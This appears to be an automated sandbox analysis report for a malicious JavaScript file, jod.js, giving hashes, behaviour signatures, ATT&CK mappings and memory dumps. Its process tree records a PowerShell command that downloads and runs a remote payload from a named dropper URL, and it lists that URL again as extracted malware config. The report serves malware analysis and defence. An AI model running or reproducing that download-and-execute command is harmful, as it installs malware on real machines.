b9ca6866ff2792c9472c7dfd63e58dac2b3d51157a3d5bea252c873a4ea29df5

Analysis

max time kernel
28s
max time network
32s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
18-05-2023 14:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

jod.js
Size

170KB
MD5

ea6103815cb06653775743a337f9d934
SHA1

9ec5e3f4bb4b39fcb61e0a5f15b0c6244a15ad60
SHA256

b9ca6866ff2792c9472c7dfd63e58dac2b3d51157a3d5bea252c873a4ea29df5
SHA512

7fd07e097673d14783117dd4180538ae0057530cecfb4eac14126f437272eb07e9bea10aed7ba610a9039a3ca9d08156d82e12bb89454abad1e29870e4797e73
SSDEEP

3072:zbT1AJM/EaZ8ok36/EI4+ZQSU2bokXPXliq3kJIAsKL3bT1AJM/EaZ8ok36/EI4c:zbZ0M/EaZ8ok36RftbokXsbZ0M/EaZ8M

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://propagandaetrafego.com/b.jpg

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 1312 powershell.exe
5 1312 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1312 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1312 powershell.exe

flow	pid	process
4	1312	powershell.exe
5	1312	powershell.exe

pid	process
1312	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1312	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

wscript.exe

description	pid	process	target process
PID 1696 wrote to memory of 1312	1696	wscript.exe	powershell.exe
PID 1696 wrote to memory of 1312	1696	wscript.exe	powershell.exe
PID 1696 wrote to memory of 1312	1696	wscript.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\jod.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX (New-Object Net.WebClient).DownloadString.Invoke('https://propagandaetrafego.com/b.jpg')
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1312

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1312-59-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/1312-58-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/1312-61-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/1312-60-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/1312-62-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/1312-63-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download